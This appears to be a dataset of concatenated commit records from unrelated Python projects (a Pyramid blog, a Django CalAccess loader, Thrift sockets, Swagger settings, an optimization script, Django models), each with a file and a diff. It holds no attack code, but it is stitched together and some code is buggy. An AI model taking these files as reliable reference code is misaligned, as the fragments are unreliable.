    """Forget the auth cookie and redirect back to the home page."""
    forget_headers = forget(request)
    return HTTPFound(request.route_url('home'), headers=forget_headers)
@view_config(route_name="api_list",
             renderer="json",
             permission="view")
def api_list_view(request):
    """Return all posts as JSON; 404 when there are none."""
    all_posts = request.dbsession.query(BlogPost).all()
    serialized = [post.to_json() for post in all_posts]
    if not serialized:
        return HTTPNotFound()
    return serialized
@view_config(route_name="api_post",
             renderer="json",
             permission="view")
def api_post_view(request):
    """Return one post as JSON; `?summary=True` returns only its summary."""
    query = request.dbsession.query(BlogPost)
    post = query.filter(BlogPost.id == request.matchdict['id']).first()
    if post:
        if request.params.get('summary') == 'True':
            # NOTE(review): this returns a JSON *string* (json.dumps inside a
            # json renderer, so it gets double-encoded) — confirm intent.
            return json.dumps({"summary": get_summary(post.html)})
        post = post.to_json()
        return post
    return HTTPNotFound()
@view_config(route_name="email",
             renderer="json",
             require_csrf=False,
             permission="view")
def hire_me(request):
    """Send email and text for hire me button.

    Requires POST fields `email`, `body`, and `subject`; renders the body
    as markdown and mails it.
    """
    if request.method == "POST":
        post_dict_keys = list(request.POST.keys())
        if "email" in post_dict_keys and "body" in post_dict_keys and "subject" in post_dict_keys:
            email = request.POST["email"]
            # Consistency fix: render with the module-level markdown
            # `extensions` list (codehilite + tables) like every other
            # markdown call in this module, instead of a hard-coded subset.
            html = markdown.markdown(request.POST["body"],
                                     extensions=extensions)
            subject = request.POST["subject"]
            message = Message(subject=subject,
                              sender='admin@mysite.com',
                              recipients=["amosboldor@gmail.com"],
                              body=email + '\n' + html)
            request.mailer.send(message)
            return {}
    return {}
@view_config(route_name='projects',
             renderer='../templates/projects.jinja2',
             permission='view')
def projects(request):
    """Render the static projects page template."""
    return {}
@view_config(route_name='delete',
             permission='delete')
def delete_post(request):
    """Delete a blog post and redirect home.

    Robustness fix: a DELETE for an unknown id now returns 404 instead of
    crashing when ``dbsession.delete`` is handed ``None``.
    """
    if request.method == "DELETE":
        query = request.dbsession.query(BlogPost)
        post = query.filter(BlogPost.id == request.matchdict['id']).first()
        if post is None:
            return HTTPNotFound()
        request.dbsession.delete(post)
        return HTTPFound(location=request.route_url('home'))
    return {}
|
Python
| 0
|
@@ -5405,18 +5405,18 @@
ons=
-%5B'tables'%5D
+extensions
)%0A
|
4177655955f38eae919627bd75e0ee7a0c37c0c5
|
Simplify loading logger
|
calaccess_raw/management/commands/loadcalaccessrawfile.py
|
calaccess_raw/management/commands/loadcalaccessrawfile.py
|
import csv
from django.db import connection
from django.db.models.loading import get_model
from django.core.management.base import LabelCommand
from calaccess_raw.management.commands import CalAccessCommand
class Command(CalAccessCommand, LabelCommand):
    help = 'Load a cleaned CalAccess file for a model into the database'
    args = '<model name>'

    # Trick for reformating date strings in source data so that they can
    # be gobbled up by MySQL. You'll see how below.
    date_sql = "DATE_FORMAT(str_to_date(@`%s`, '%%c/%%e/%%Y'), '%%Y-%%m-%%d')"

    def handle_label(self, label, **options):
        """Entry point: *label* is the model name whose CSV gets loaded."""
        self.verbosity = options.get("verbosity")
        self.load(label)

    def load(self, model_name):
        """
        Loads the source CSV for the provided model.

        Truncates the model's table, then bulk-loads the CSV with MySQL's
        LOAD DATA LOCAL INFILE, reformatting date columns on the way in.
        """
        if self.verbosity:
            self.log(" Loading %s" % model_name)

        model = get_model("calaccess_raw", model_name)
        csv_path = model.objects.get_csv_path()

        # Flush
        c = connection.cursor()
        c.execute('TRUNCATE TABLE %s' % model._meta.db_table)

        # Build the MySQL LOAD DATA INFILE command
        bulk_sql_load_part_1 = '''
            LOAD DATA LOCAL INFILE '%s'
            INTO TABLE %s
            FIELDS TERMINATED BY ','
            OPTIONALLY ENCLOSED BY '"'
            LINES TERMINATED BY '\\r\\n'
            IGNORE 1 LINES
            (
        ''' % (csv_path, model._meta.db_table)

        # First pass over the file grabs the header row.
        # NOTE(review): `csv_reader.next()` is Python 2 only; on Python 3
        # this would be `next(csv_reader)`.
        infile = open(csv_path)
        csv_reader = csv.reader(infile)
        headers = csv_reader.next()
        infile.close()

        # Second pass counts the data rows for the post-load sanity check.
        infile = open(csv_path)
        csv_record_cnt = len(infile.readlines()) - 1
        infile.close()

        header_sql_list = []
        date_set_list = []
        for h in headers:
            # If it is a date field, we need to reformat the data
            # so that MySQL will properly parse it on the way in.
            if h in model.DATE_FIELDS:
                header_sql_list.append('@`%s`' % h)
                date_set_list.append(
                    "`%s` = %s" % (h, self.date_sql % h)
                )
            else:
                header_sql_list.append('`%s`' % h)

        bulk_sql_load = bulk_sql_load_part_1 + ','.join(header_sql_list) + ')'
        if date_set_list:
            bulk_sql_load += " set %s" % ",".join(date_set_list)

        # Run the query
        cnt = c.execute(bulk_sql_load)

        # Report back on how we did
        if self.verbosity:
            if cnt == csv_record_cnt:
                self.success("  Table record count matches CSV")
            else:
                msg = '  Table Record count doesn\'t match CSV. \
Table: %s\tCSV: %s'
                self.failure(msg % (
                    cnt,
                    csv_record_cnt,
                ))
|
Python
| 0.000025
|
@@ -2481,17 +2481,17 @@
if cnt
-=
+!
= csv_re
@@ -2504,91 +2504,8 @@
nt:%0A
- self.success(%22 Table record count matches CSV%22)%0A else:%0A
|
20003796eb8f3949d931a4b8752fb07f2be39136
|
Update utils.py
|
church/utils.py
|
church/utils.py
|
from functools import lru_cache
from os.path import (
join,
dirname,
abspath
)
PATH = abspath(join(dirname(__file__), 'data'))
__all__ = ['priest']
@lru_cache(maxsize=None)
def pull(filename, lang='en_us'):
    """Read (and cache) the lines of ``data/<lang>/<filename>``.

    Known locale folders:

    1. de_de - Folder for Germany.
    2. en_us - Folder for United States
    3. ru_ru - Folder for Russian Federation.
    """
    filepath = join(PATH + '/' + lang, filename)
    with open(filepath, 'r') as source:
        return source.readlines()
|
Python
| 0.000001
|
@@ -138,29 +138,8 @@
))%0A%0A
-__all__ = %5B'priest'%5D%0A
%0A%0A@l
@@ -490,16 +490,17 @@
return _result
+%0A
|
7433bc7f2cb0e71d8b9440ec5df8164533917fb3
|
Use global options for determining dry_run
|
inspectors/utils/inspector.py
|
inspectors/utils/inspector.py
|
from utils import utils
import os
import re
import logging
import datetime
import urllib.parse
# Save a report to disk, provide output along the way.
#
# 1) download report to disk
# 2) extract text from downloaded report using report['file_type']
# 3) write report metadata to disk
#
# fields used: file_type, url, inspector, year, report_id
# fields added: report_path, text_path
def save_report(report, options=None):
    """Download, extract, and persist a single report.

    Downloads the file, extracts its text via report['file_type'], and
    writes the metadata JSON. Honors options['dry_run'] by skipping the
    download/extraction steps. Returns True on success, False when the
    download fails; raises Exception when validation fails.
    """
    options = {} if not options else options

    # create some inferred fields, set defaults
    preprocess_report(report)

    # validate report will return True, or a string message
    validation = validate_report(report)
    if validation != True:
        raise Exception("[%s][%s][%s] Invalid report: %s\n\n%s" % (report.get('type', None), report.get('published_on', None), report.get('report_id', None), validation, str(report)))

    logging.warn("[%s][%s][%s]" % (report['type'], report['published_on'], report['report_id']))

    if options.get('dry_run'):
        logging.warn('\tskipping download and extraction, dry_run == True')
    else:
        report_path = download_report(report)
        if not report_path:
            logging.warn("\terror downloading report: sadly, skipping.")
            return False
        logging.warn("\treport: %s" % report_path)

        text_path = extract_report(report)
        logging.warn("\ttext: %s" % text_path)

    # metadata is written even on a dry run
    data_path = write_report(report)
    logging.warn("\tdata: %s" % data_path)

    return True
# Preprocess before validation, to catch cases where inference didn't work.
# So, fields may be absent at this time.
def preprocess_report(report):
    """Infer missing fields on *report* in place, before validation.

    Sets a default ``type``, derives ``year`` from ``published_on``, and
    guesses ``file_type`` from the URL's file extension.
    """
    # not sure what I'm doing with this field yet
    if report.get("type") is None:
        report["type"] = "report"

    # if we have a date, but no explicit year, extract it
    if report.get("published_on") and (report.get("year") is None):
        report["year"] = year_from(report)

    # if we have a URL, but no explicit file type, try to detect it
    if report.get("url") and (report.get("file_type") is None):
        url_path = urllib.parse.urlparse(report["url"]).path
        path_bits = url_path.split(".")
        if len(path_bits) > 1:
            report["file_type"] = path_bits[-1]
# Ensure required fields are present
def validate_report(report):
    """Check required fields and formats; return True or an error message."""
    required_fields = (
        "published_on", "report_id", "title", "url",
        "inspector", "inspector_url", "agency", "agency_name",
    )
    for field in required_fields:
        value = report.get(field, None)
        if value is None or value == "":
            return "Missing a required field: %s" % field

    # report_id can't have slashes, it'll mess up the directory structure
    if "/" in report["report_id"]:
        return "Invalid / in report_id - find another way: %s" % report["report_id"]

    if report.get("year") is None:
        return "Couldn't get `year`, for some reason."
    if report.get("type") is None:
        return "Er, this shouldn't happen: empty `type` field."
    if report.get("file_type") is None:
        return "Couldn't figure out `file_type` from URL, please set it explicitly."

    try:
        datetime.datetime.strptime(report['published_on'], "%Y-%m-%d")
    except ValueError:
        return "Invalid format for `published_on`, must be YYYY-MM-DD."
    # strptime tolerates "2014-1-2"; insist on zero-padded parts
    if re.search("(\\-\\d[\\-]|\\-\\d$)", report["published_on"]):
        return "Invalid format for `published_on`, dates must use zero prefixing."

    return True
def download_report(report):
    """Fetch the report file into the data dir; return its relative path or None."""
    report_path = path_for(report, report['file_type'])
    is_binary = report['file_type'].lower() == 'pdf'
    downloaded = utils.download(
        report['url'],
        "%s/%s" % (utils.data_dir(), report_path),
        {'binary': is_binary}
    )
    return report_path if downloaded else None
# relies on putting text next to report_path
def extract_report(report):
    """Extract plain text from a downloaded report; return the text path or None."""
    report_path = path_for(report, report['file_type'])
    kind = report['file_type'].lower()
    if kind == "pdf":
        return utils.text_from_pdf(report_path)
    if kind.startswith("htm"):
        return utils.text_from_html(report_path)
    logging.warn("Unknown file type, don't know how to extract text!")
    return None
def write_report(report):
    """Serialize report metadata to JSON in the data dir; return its path."""
    data_path = path_for(report, "json")
    destination = "%s/%s" % (utils.data_dir(), data_path)
    utils.write(utils.json_for(report), destination)
    return data_path
def path_for(report, ext):
    """Relative on-disk path for a report artifact with extension *ext*."""
    return "%s/%s/%s/report.%s" % (
        report['inspector'], report['year'], report['report_id'], ext)
def cache(inspector, path):
    """Cache-file location for an inspector-relative path."""
    return os.path.join(utils.cache_dir(), inspector, path)
# get year for a report from its publish date
def year_from(report):
    """Publication year (int) parsed from the report's publish date."""
    return int(report['published_on'].partition("-")[0])
# assume standard options for IG scrapers, since/year
def year_range(options):
    """Build the list of years to scrape from the `since`/`year` options.

    `since` (a string) wins over `year`; both are clamped to the current
    year. With neither set, only the current year is scraped.
    """
    this_year = datetime.datetime.now().year

    since = options.get('since', None)
    if type(since) is not str:
        since = None
    if since:
        since = min(int(since), this_year)

    year = options.get('year', None)
    if year:
        year = min(int(year), this_year)

    if since:
        first, last = since, this_year
    elif year:
        first, last = year, year
    else:
        first, last = this_year, this_year
    return list(range(first, last + 1))
|
Python
| 0
|
@@ -403,22 +403,8 @@
port
-, options=None
):%0A
@@ -418,38 +418,23 @@
s =
-%7B%7D if not options else
+utils.
options
+()
%0A%0A
|
3c978eab962ed8a6158df2266852a1b1a47c4ec7
|
add more terminal nodes
|
gdcdatamodel/query.py
|
gdcdatamodel/query.py
|
from psqlgraph import Node, Edge
# Maps root node label -> {destination label -> set of dotted association
# paths}; filled in by construct_traversals() at import time.
traversals = {}

# Labels that may terminate a traversal but must never be traversed THROUGH.
terminal_nodes = ['annotations', 'centers', 'archives', 'tissue_source_sites',
                  'files', 'related_files', 'describing_files']
def construct_traversals(root, node, visited, path):
    """Depth-first walk of the graph schema from *root*, recording every
    association path into the module-level `traversals` dict.

    root    -- label of the node type the walk started from
    node    -- current node class
    visited -- node classes already on the current path (prevents cycles)
    path    -- association names accumulated so far
    """
    recurse = lambda neighbor: (
        neighbor
        # no backtracking
        and neighbor not in visited
        and neighbor != node
        # no traveling THROUGH terminal nodes
        and (path[-1] not in terminal_nodes
             if path else neighbor.label not in terminal_nodes))
    # Follow edges where the current node is the source ...
    for edge in Edge._get_edges_with_src(node.__name__):
        neighbor = [n for n in Node.get_subclasses()
                    if n.__name__ == edge.__dst_class__][0]
        if recurse(neighbor):
            construct_traversals(
                root, neighbor, visited+[node], path+[edge.__src_dst_assoc__])
    # ... and edges where it is the destination (reverse direction).
    for edge in Edge._get_edges_with_dst(node.__name__):
        neighbor = [n for n in Node.get_subclasses()
                    if n.__name__ == edge.__src_class__][0]
        if recurse(neighbor):
            construct_traversals(
                root, neighbor, visited+[node], path+[edge.__dst_src_assoc__])
    # Record the path that led here (empty string for the root itself).
    traversals[root][node.label] = traversals[root].get(node.label) or set()
    traversals[root][node.label].add('.'.join(path))
# Precompute, for every node type, the association paths that reach every
# other reachable node type. Runs once at import time.
for node in Node.get_subclasses():
    traversals[node.label] = {}
    construct_traversals(node.label, node, [node], [])
def union_subq_without_path(q, *args, **kwargs):
    """Complement query: the rows of *q* NOT matched by union_subq_path."""
    matched = union_subq_path(q, *args, **kwargs)
    return q.except_(matched)
def union_subq_path(q, dst_label, post_filters=[]):
    """Union of subqueries over every known traversal path from the query's
    entity label to *dst_label*.

    Returns *q* unchanged when no traversal path is known.
    """
    src_label = q.entity().label
    known_paths = traversals.get(src_label, {}).get(dst_label, {})
    if not known_paths:
        return q
    remaining = list(known_paths)
    combined = q.subq_path(remaining.pop(), post_filters)
    while remaining:
        combined = combined.union(q.subq_path(remaining.pop(), post_filters))
    return combined
|
Python
| 0
|
@@ -184,16 +184,505 @@
g_files'
+,%0A 'clinical_metadata_files', 'experiment_metadata_files', 'run_metadata_files',%0A 'analysis_metadata_files', 'biospecimen_metadata_files', 'aligned_reads_metrics',%0A 'read_group_metrics', 'pathology_reports', 'simple_germline_variations',%0A 'aligned_reads_indexes', 'mirna_expressions', 'exon_expressions',%0A 'simple_somatic_mutations', 'gene_expressions', 'aggregated_somatic_mutations',%0A
%5D%0A%0A%0Adef
@@ -1024,16 +1024,134 @@
l_nodes)
+%0A and (not path%5B-1%5D.startswith('_related')%0A if path else not neighbor.label.startswith('_related'))
)%0A%0A f
|
7c6c8e9ed2b89c7fa15992b5b68c793a53b327d8
|
fix test case to run on_commit hook before assertion
|
django_datawatch/tests/test_trigger_update.py
|
django_datawatch/tests/test_trigger_update.py
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals, print_function
from django_datawatch.backends.base import BaseBackend
try:
from unittest import mock
except ImportError:
import mock
from django.test.testcases import TestCase, override_settings
from django_datawatch.datawatch import datawatch, run_checks
from django_datawatch.base import BaseCheck
from django_datawatch.models import Result
@datawatch.register
class CheckTriggerUpdate(BaseCheck):
    """Minimal check used to exercise the trigger-update machinery.

    Registered against Result so that saving a Result fires the 'foobar'
    related-update trigger.
    """
    model_class = Result
    trigger_update = dict(foobar=Result)

    def get_foobar_payload(self, instance):
        # Payload resolver for the 'foobar' trigger: the instance itself.
        return instance

    def get_identifier(self, payload):
        # Use the model primary key as the check identifier.
        return payload.pk

    def check(self, payload):
        # Trivial pass-through check; only the plumbing matters in tests.
        return payload
class TriggerUpdateTestCase(TestCase):
    """Verify that related-check updates fire only when
    DJANGO_DATAWATCH_RUN_SIGNALS is enabled."""

    @override_settings(DJANGO_DATAWATCH_RUN_SIGNALS=True)
    @mock.patch('django_datawatch.datawatch.DatawatchHandler.update_related')
    def test_setting_run_signals_true(self, mock_update):
        # Signals enabled: a save must fan out to update_related.
        run_checks(sender=None, instance=None, created=None, raw=None,
                   using=None)
        self.assertTrue(mock_update.called)

    @override_settings(DJANGO_DATAWATCH_RUN_SIGNALS=False)
    @mock.patch('django_datawatch.datawatch.DatawatchHandler.update_related')
    def test_setting_run_signals_false(self, mock_update):
        # Signals disabled: update_related must NOT be called.
        run_checks(sender=None, instance=None, created=None, raw=None,
                   using=None)
        self.assertFalse(mock_update.called)

    @override_settings(DJANGO_DATAWATCH_RUN_SIGNALS=True)
    @mock.patch('django_datawatch.datawatch.DatawatchHandler.get_backend')
    def test_update_related_calls_backend(self, mock_get_backend):
        # update_related must delegate execution to the configured backend.
        backend = mock.Mock(spec=BaseBackend)
        mock_get_backend.return_value = backend
        datawatch.update_related(sender=Result, instance=Result())
        self.assertTrue(backend.run.called)
|
Python
| 0.000001
|
@@ -78,64 +78,8 @@
on%0A%0A
-from django_datawatch.backends.base import BaseBackend%0A%0A
try:
@@ -146,16 +146,50 @@
t mock%0A%0A
+from django.db import transaction%0A
from dja
@@ -243,16 +243,71 @@
ttings%0A%0A
+from django_datawatch.backends.base import BaseBackend%0A
from dja
@@ -1478,32 +1478,535 @@
update.called)%0A%0A
+ def run_commit_hooks(self):%0A %22%22%22%0A Fake transaction commit to run delayed on_commit functions%0A %0A source: https://medium.com/@juan.madurga/speed-up-django-transaction-hooks-tests-6de4a558ef96%0A %22%22%22%0A for db_name in reversed(self._databases_names()):%0A with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.validate_no_atomic_block', lambda a: False):%0A transaction.get_connection(using=db_name).run_and_clear_commit_hooks()%0A%0A
@override_se
@@ -2283,16 +2283,16 @@
backend%0A
-
@@ -2349,16 +2349,130 @@
esult())
+%0A%0A # run our on_commit hook%0A self.run_commit_hooks()%0A%0A # make sure that we called backend.run
%0A
|
26549566bc502dece76ad596126b219dc5c8991c
|
Fix for IPv6 Python sockets binding localhost problem
|
lib/py/src/transport/TSocket.py
|
lib/py/src/transport/TSocket.py
|
#!/usr/bin/env python
#
# Copyright (c) 2006- Facebook
# Distributed under the Thrift Software License
#
# See accompanying file LICENSE or visit the Thrift site at:
# http://developers.facebook.com/thrift/
from TTransport import *
import socket
class TSocket(TTransportBase):
  """Socket implementation of TTransport base."""

  def __init__(self, host='localhost', port=9090):
    # handle is the underlying socket object; None until open()/setHandle().
    self.host = host
    self.port = port
    self.handle = None

  def setHandle(self, h):
    # Adopt an already-connected socket (used by TServerSocket.accept()).
    self.handle = h

  def isOpen(self):
    return self.handle != None

  def setTimeout(self, ms):
    # ms is milliseconds; socket.settimeout() takes seconds.
    if (self.handle != None):
      self.handle.settimeout(ms/1000.00)
    else:
      raise TTransportException(TTransportException.NOT_OPEN, 'No handle yet in TSocket')

  def open(self):
    # Try each address from getaddrinfo (IPv4 and IPv6) until one connects;
    # only the failure of the last candidate is propagated.
    try:
      res0 = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
      for res in res0:
        self.handle = socket.socket(res[0], res[1])
        try:
          self.handle.connect(res[4])
        except socket.error, e:
          if res is not res0[-1]:
            continue
          else:
            raise e
        break
    except socket.error, e:
      raise TTransportException(TTransportException.NOT_OPEN, 'Could not connect to %s:%d' % (self.host, self.port))

  def close(self):
    if self.handle != None:
      self.handle.close()
      self.handle = None

  def read(self, sz):
    # recv() may return fewer than sz bytes; an empty result means the
    # peer closed the connection.
    buff = self.handle.recv(sz)
    if len(buff) == 0:
      raise TTransportException('TSocket read 0 bytes')
    return buff

  def write(self, buff):
    # Loop until the whole buffer is flushed; send() may write partially.
    sent = 0
    have = len(buff)
    while sent < have:
      plus = self.handle.send(buff)
      if plus == 0:
        raise TTransportException('TSocket sent 0 bytes')
      sent += plus
      buff = buff[plus:]

  def flush(self):
    # No user-space buffering at this layer; nothing to flush.
    pass
class TServerSocket(TServerTransportBase):
  """Socket implementation of TServerTransport base."""

  def __init__(self, port):
    self.port = port
    self.handle = None

  def listen(self):
    # BUG FIX: without AI_PASSIVE, getaddrinfo(None, ...) resolves to
    # loopback addresses, so the server socket bound to localhost only
    # (notably broken for IPv6). AI_PASSIVE yields wildcard addresses
    # suitable for bind().
    res0 = socket.getaddrinfo(None, self.port, socket.AF_UNSPEC,
                              socket.SOCK_STREAM, 0, socket.AI_PASSIVE)
    # Prefer an IPv6 result (dual-stack where supported); otherwise fall
    # back to the last candidate.
    for res in res0:
      if res[0] is socket.AF_INET6 or res is res0[-1]:
        break

    self.handle = socket.socket(res[0], res[1])
    self.handle.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    if hasattr(self.handle, 'set_timeout'):
      self.handle.set_timeout(None)
    self.handle.bind(res[4])
    self.handle.listen(128)

  def accept(self):
    # Wrap the accepted connection in a client-side TSocket.
    (client, addr) = self.handle.accept()
    result = TSocket()
    result.setHandle(client)
    return result

  def close(self):
    self.handle.close()
    self.handle = None
|
Python
| 0.000001
|
@@ -853,24 +853,46 @@
.SOCK_STREAM
+, 0, socket.AI_PASSIVE
)%0A for
|
2323699ae6b266823b30784293b2d1d900d94700
|
Bump aioTV version.
|
rest_framework_swagger/__init__.py
|
rest_framework_swagger/__init__.py
|
VERSION = '0.3.5-aio-v2'

# Fallback configuration used when the Django project does not provide its
# own SWAGGER_SETTINGS (or when Django itself is unavailable).
DEFAULT_SWAGGER_SETTINGS = {
    'exclude_namespaces': [],
    'api_version': '',
    'api_key': '',
    'token_type': 'Token',
    'enabled_methods': ['get', 'post', 'put', 'patch', 'delete'],
    'is_authenticated': False,
    'is_superuser': False,
    'permission_denied_handler': None,
    'resource_access_handler': None,
    'template_path': 'rest_framework_swagger/index.html',
    'doc_expansion': 'none',
    'base_path': ''
}

try:
    from django.conf import settings
    from django.test.signals import setting_changed

    def load_settings(provided_settings):
        """Install *provided_settings* globally, filling gaps with defaults."""
        global SWAGGER_SETTINGS
        SWAGGER_SETTINGS = provided_settings
        for key, value in DEFAULT_SWAGGER_SETTINGS.items():
            if key not in SWAGGER_SETTINGS:
                SWAGGER_SETTINGS[key] = value

    def reload_settings(*args, **kwargs):
        """setting_changed handler: re-load when SWAGGER_SETTINGS changes
        under override_settings in tests."""
        setting, value = kwargs['setting'], kwargs['value']
        if setting == 'SWAGGER_SETTINGS':
            load_settings(value)

    load_settings(getattr(settings,
                          'SWAGGER_SETTINGS',
                          DEFAULT_SWAGGER_SETTINGS))

    setting_changed.connect(reload_settings)
except Exception:
    # BUG FIX: this was a bare `except:`, which also swallowed SystemExit
    # and KeyboardInterrupt. Exception still covers ImportError and
    # Django's ImproperlyConfigured when settings are unavailable.
    SWAGGER_SETTINGS = DEFAULT_SWAGGER_SETTINGS
|
Python
| 0
|
@@ -19,9 +19,9 @@
io-v
-2
+3
'%0A%0AD
|
e4c1a22c9f4681ffdd2156eb8634ed1a79995d19
|
Fix a bug.
|
datapipe/optimization/bruteforce.py
|
datapipe/optimization/bruteforce.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Jérémie DECOCK (http://www.jdhp.org)
# This script is provided under the terms and conditions of the MIT license:
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
__all__ = []
import json
from scipy import optimize
from datapipe.optimization.objectivefunc.wavelets_mrfilter_delta_psi import WaveletObjectiveFunction
from datapipe.optimization.objectivefunc.tailcut_delta_psi import TailcutObjectiveFunction
# For wavelets
import datapipe.denoising.cdf
from datapipe.denoising.inverse_transform_sampling import EmpiricalDistribution
# For tailcut
from datapipe.io import geometry_converter
def main():
    """Run a brute-force parameter search for the selected cleaning
    algorithm/instrument pair and dump the results to optimize_sigma.json."""

    algo = "wavelet_mrfilter"
    #algo = "tailcut"

    instrument = "astri"
    #instrument = "astri_konrad"
    #instrument = "digicam"
    #instrument = "flashcam"
    #instrument = "nectarcam"
    #instrument = "lstcam"

    print("algo:", algo)
    print("instrument:", instrument)

    # Per-instrument setup: (input subdirectory, noise CDF file, geometry
    # file). astri_konrad shares the astri CDF and geometry.
    instrument_setup = {
        "astri":        ("astri",        datapipe.denoising.cdf.ASTRI_CDF_FILE,     "astri.geom.json"),
        "astri_konrad": ("astri_konrad", datapipe.denoising.cdf.ASTRI_CDF_FILE,     "astri.geom.json"),
        "digicam":      ("digicam",      datapipe.denoising.cdf.DIGICAM_CDF_FILE,   "digicam2d.geom.json"),
        "flashcam":     ("flashcam",     datapipe.denoising.cdf.FLASHCAM_CDF_FILE,  "flashcam2d.geom.json"),
        "nectarcam":    ("nectarcam",    datapipe.denoising.cdf.NECTARCAM_CDF_FILE, "nectarcam2d.geom.json"),
        "lstcam":       ("lstcam",       datapipe.denoising.cdf.LSTCAM_CDF_FILE,    "lstcam2d.geom.json"),
    }
    try:
        subdir, cdf_file, geom_file = instrument_setup[instrument]
    except KeyError:
        raise Exception("Unknown instrument", instrument)

    input_files = ["/dev/shm/.jd/%s/gamma/" % subdir]
    noise_distribution = EmpiricalDistribution(cdf_file)
    geom = geometry_converter.json_file_to_geom("./datapipe/io/geom/%s" % geom_file)

    # BUG FIX: `algo` is set to "wavelet_mrfilter" above, but this branch
    # previously matched only the literal "wavelet", so the function always
    # fell through to ValueError("Unknown algorithm").
    if algo in ("wavelet", "wavelet_mrfilter"):
        func = WaveletObjectiveFunction(input_files=input_files,
                                        noise_distribution=noise_distribution,
                                        max_num_img=None,
                                        aggregation_method="mean")  # "mean" or "median"
        # Four wavelet scale thresholds, each searched over [1, 5).
        search_ranges = tuple(slice(1, 5, 1) for _ in range(4))
    elif algo == "tailcut":
        func = TailcutObjectiveFunction(input_files=input_files,
                                        geom=geom,
                                        max_num_img=None,
                                        aggregation_method="mean")  # "mean" or "median"
        # High and low picture thresholds, each searched over [1, 10).
        search_ranges = tuple(slice(1, 10, 1) for _ in range(2))
    else:
        raise ValueError("Unknown algorithm", algo)

    res = optimize.brute(func,
                         search_ranges,
                         full_output=True,
                         finish=None)    #optimize.fmin)

    print("x* =", res[0])
    print("f(x*) =", res[1])

    # SAVE RESULTS ############################################################

    res_dict = {
        "best_solution": res[0].tolist(),
        "best_score": float(res[1]),
        "solutions": res[2].tolist(),
        "scores": res[3].tolist()
    }

    with open("optimize_sigma.json", "w") as fd:
        json.dump(res_dict, fd, sort_keys=True, indent=4)  # pretty print format


if __name__ == "__main__":
    main()
|
Python
| 0
|
@@ -1358,16 +1358,37 @@
import
+ObjectiveFunction as
WaveletO
@@ -1470,16 +1470,37 @@
import
+ObjectiveFunction as
TailcutO
|
00bf40ba386d7d1ffebcc1a41766250e0fc975ac
|
Add related name fields
|
src/core/models/base.py
|
src/core/models/base.py
|
from django.db import models
from django.contrib.auth.models import User
class Location(models.Model):
	"""Geographic point (x/y coordinates) referenced by ideas and events."""
	class Meta:
		app_label = "core"

	# Coordinates stored with 5 decimal places.
	x = models.DecimalField(max_digits=10, decimal_places=5)
	y = models.DecimalField(max_digits=10, decimal_places=5)

	def __str__(self):
		return "x:" + str(self.x) + ", y:" + str(self.y)
class Idea(models.Model):
	"""An activity proposal that users can vote on via Suggestion."""
	class Meta:
		app_label = "core"

	time = models.DateTimeField(null=True, blank=True)
	location = models.ForeignKey(Location, null=True, blank=True)
	owner = models.ForeignKey(User, related_name='idea_owner')
	# Voters are attached through the Suggestion intermediate model.
	users = models.ManyToManyField(User, through='Suggestion')
	activity = models.CharField(max_length=50, blank=True)

	def __str__(self):
		return str(self.owner) + ":" + str(self.activity) + " @ " + str(self.location) + ", " + str(self.time)
class Suggestion(models.Model):
	"""A single user's vote (yes/no/maybe) on an Idea."""
	class Meta:
		app_label = "core"

	YES = 'Y'
	NO = 'N'
	MAYBE = 'M'
	NONE = 'O'
	RESPONSE_CHOICES = (
		(YES, 'Yes'),
		(NO, 'No'),
		(MAYBE, 'Maybe'),
		(NONE, 'No vote'),
	)
	response = models.CharField(max_length=1, choices=RESPONSE_CHOICES, default=NONE)
	user = models.ForeignKey(User)
	idea = models.ForeignKey(Idea)

	def __str__(self):
		# BUG FIX: the model has no `suggestion` attribute, so the original
		# str(self.suggestion) raised AttributeError; show the response
		# code instead.
		return str(self.user) + ":" + str(self.response)
class Event(models.Model):
	"""A scheduled gathering users are invited to via Invite."""
	class Meta:
		app_label = "core"

	owner = models.ForeignKey(User, related_name='event_owner')
	# Invitees are attached through the Invite intermediate model.
	invites = models.ManyToManyField(User, through='Invite')
	description = models.TextField()
	location = models.ForeignKey(Location)
	start_time = models.DateTimeField()
	end_time = models.DateTimeField(null=True, blank=True)

	def __str__(self):
		return str(self.owner) + ":" + str(self.location) + "@" + str(self.start_time)
class Invite(models.Model):
	"""A user's invitation to an Event, carrying their RSVP state."""
	class Meta:
		app_label = "core"

	YES = 'Y'
	NO = 'N'
	MAYBE_YES = 'MY'
	MAYBE_NO = 'MN'
	NONE = 'O'
	RSVP_CHOICES = (
		(YES, 'Yes'),
		(NO, 'No'),
		(MAYBE_YES, 'Maybe Yes'),
		(MAYBE_NO, 'Maybe No'),
		(NONE, 'No response'),
	)
	event = models.ForeignKey(Event)
	user = models.ForeignKey(User)
	rsvp = models.CharField(max_length=2, choices=RSVP_CHOICES, default=NONE)

	def __str__(self):
		# BUG FIX: `user` and `event` were referenced as bare names, which
		# raised NameError; they are instance attributes.
		return str(self.user) + ":" + str(self.event)
|
Python
| 0.000001
|
@@ -499,16 +499,38 @@
ank=True
+, related_name='ideas'
)%0A%09owner
@@ -574,22 +574,17 @@
me='idea
-_owner
+s
')%0A%09user
@@ -636,16 +636,49 @@
gestion'
+, related_name='idea_suggestions'
)%0A%09activ
@@ -1181,16 +1181,44 @@
Key(User
+, related_name='suggestions'
)%0A%09idea
